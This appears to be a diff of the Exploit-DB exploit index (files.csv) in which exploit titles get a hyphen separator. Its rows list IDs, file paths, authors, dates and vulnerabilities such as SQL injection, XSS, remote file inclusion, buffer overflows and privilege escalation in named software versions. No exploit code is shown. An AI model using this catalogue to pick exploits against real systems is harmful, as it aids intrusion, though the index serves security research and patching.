28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail - Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 @@ -25946,7 +25941,7 @@ id,file,description,date,author,platform,type,port 28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 - Admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - Index.php Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - Popup.php SQL Injection",2006-11-04,x23,php,webapps,0 -28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 +28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 - UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 - RSS.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 @@ -26061,7 +26056,7 @@ id,file,description,date,author,platform,type,port 29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant XSS (0Day)",2013-10-17,Zy0d0x,php,webapps,80 29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 -29024,platforms/asp/webapps/29024.txt,"Inventory Manager Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 +29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - Viewcart.ASP SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29026,platforms/php/webapps/29026.txt,"Mega Mall - product_review.php Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 29027,platforms/php/webapps/29027.txt,"Mega Mall - order-track.php orderNo Parameter SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 @@ -26134,13 +26129,13 @@ id,file,description,date,author,platform,type,port 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - List.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 -29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 +29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - Index.php Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - /admin/entries.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - /admin/logs.php page Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 -29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 LD.SO Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 +29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - LD.SO Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 - cat.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - search.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 - cat.asp catname Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26166,7 +26161,7 @@ id,file,description,date,author,platform,type,port 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injection",2006-11-20,"Aria-Security Team",asp,webapps,0 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow",2013-10-22,Metasploit,hardware,remote,80 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 -29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,Metasploit,windows,remote,12397 +29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection",2013-10-22,Metasploit,windows,remote,12397 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal",2013-10-22,Metasploit,windows,remote,8080 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 29132,platforms/unix/remote/29132.rb,"WebTester 5.x - Command Execution",2013-10-22,Metasploit,unix,remote,80 @@ -26178,7 +26173,7 @@ id,file,description,date,author,platform,type,port 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 -29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 +29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Remote Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26199,8 +26194,8 @@ id,file,description,date,author,platform,type,port 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 -29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 -29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 +29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - Keystone.EXE Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 +29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.ASP ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 @@ -26277,7 +26272,7 @@ id,file,description,date,author,platform,type,port 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - (.plf) Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 / 1.5 - Multiple SQL Injection",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 -29266,platforms/hardware/webapps/29266.txt,"Stem Innovation 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 +29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -26292,26 +26287,26 @@ id,file,description,date,author,platform,type,port 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS",2006-12-15,shinnai,windows,dos,0 29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - explorer.exe WMV File Handling DoS",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 -29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 +29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 -29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 -29297,platforms/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 List Command Buffer Overflow",2006-12-19,"Joxean Koret",hardware,dos,0 +29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 +29297,platforms/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",hardware,dos,0 29298,platforms/php/webapps/29298.txt,"OSTicket 1.2/1.3 Support Cards - View.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - View.php Viewcategory.php Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - Class.TX_RTEHTMLArea_PI1.php Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 -29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 Calendar.JSP Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 +29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.JSP Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,linux,remote,0 29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 - HTM2PHP.php Directory Traversal",2006-11-08,"the master",php,webapps,0 -29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 +29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29305,platforms/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 29307,platforms/windows/dos/29307.c,"Softmaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos,0 -29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g Container_Tabs.JSP Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 +29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.JSP Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - (.m3u) SEH Buffer Overflow",2013-10-30,"Mike Czumak",windows,local,0 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - add_comment.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 @@ -26377,8 +26372,8 @@ id,file,description,date,author,platform,type,port 29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - rss/index.php getdate Parameter XSS",2006-12-27,Lostmon,php,webapps,0 29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - print.php getdate Parameter XSS",2006-12-27,Lostmon,php,webapps,0 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter XSS",2006-12-27,Lostmon,php,webapps,0 -29371,platforms/multiple/remote/29371.txt,"Oracle 10g Portal Key Parameter Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 -29372,platforms/php/webapps/29372.txt,"Mobilelib Gold Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 +29371,platforms/multiple/remote/29371.txt,"Oracle 10g - Portal Key Parameter Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 +29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.DLL Local Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 @@ -26404,13 +26399,13 @@ id,file,description,date,author,platform,type,port 29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.x - Albmgr.php SQL Injection",2007-01-05,DarkFig,php,webapps,0 29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-commerce Shopping Cart - Orange.ASP SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow",2007-01-06,LMH,linux,dos,0 -29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 Identity Server IssueInstant Parameter Cross-Site Scripting",2007-01-08,anonymous,novell,remote,0 +29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 - Identity Server IssueInstant Parameter Cross-Site Scripting",2007-01-08,anonymous,novell,remote,0 29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.ASP SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0 29403,platforms/windows/local/29403.txt,"HP Multiple Products PML Driver HPZ12 - Local Privilege Escalation",2007-01-08,Sowhat,windows,local,0 29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - AJAX Index.php Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - Comment.php SQL Injection",2007-01-09,yorn,php,webapps,0 -29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 +29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 - RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - admin/admin_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29409,platforms/php/webapps/29409.txt,"Magic Photo Storage Website - admin/admin_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -26447,7 +26442,7 @@ id,file,description,date,author,platform,type,port 29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 -29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 +29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation",2006-12-18,anonymous,linux,local,0 @@ -26462,15 +26457,15 @@ id,file,description,date,author,platform,type,port 29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - .MID File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx SessionID Parameter XSS",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - Members1.aspx Multiple Parameter XSS",2007-01-15,Doz,asp,webapps,0 -29458,platforms/linux/dos/29458.txt,"Libgtop2 Library Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos,0 -29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,Metasploit,linux,remote,80 +29458,platforms/linux/dos/29458.txt,"Libgtop2 Library - Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos,0 +29513,platforms/linux/remote/29513.rb,"VICIdial Manager - Send OS Command Injection",2013-11-08,Metasploit,linux,remote,80 29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 - upgrade.php gateway Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 - suggest_category.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 - user_detail.php u Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - tell_friend.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 - WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",osx,dos,0 29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional WSFTPURL.EXE Local Memory Corruption",2007-01-15,LMH,windows,dos,0 +29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - WSFTPURL.EXE Local Memory Corruption",2007-01-15,LMH,windows,dos,0 29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local,0 29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 @@ -26519,7 +26514,7 @@ id,file,description,date,author,platform,type,port 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode - PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 -30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 +30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 30047,platforms/php/webapps/30047.txt,"VBulletin 3.6.6 - Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.ASP Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 @@ -26535,7 +26530,7 @@ id,file,description,date,author,platform,type,port 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Local Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 -30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 +30018,platforms/linux/remote/30018.py,"Python 2.5 - PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 @@ -26544,8 +26539,8 @@ id,file,description,date,author,platform,type,port 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 -30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 -30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 +30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 +30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 - Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 @@ -26561,7 +26556,7 @@ id,file,description,date,author,platform,type,port 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - CSRF File Upload",2013-11-10,DevilScreaM,php,webapps,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 -29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 M3U Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 +29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - .M3U Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - Admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 @@ -26584,7 +26579,7 @@ id,file,description,date,author,platform,type,port 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 -29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 +29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote,0 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0 @@ -26616,8 +26611,8 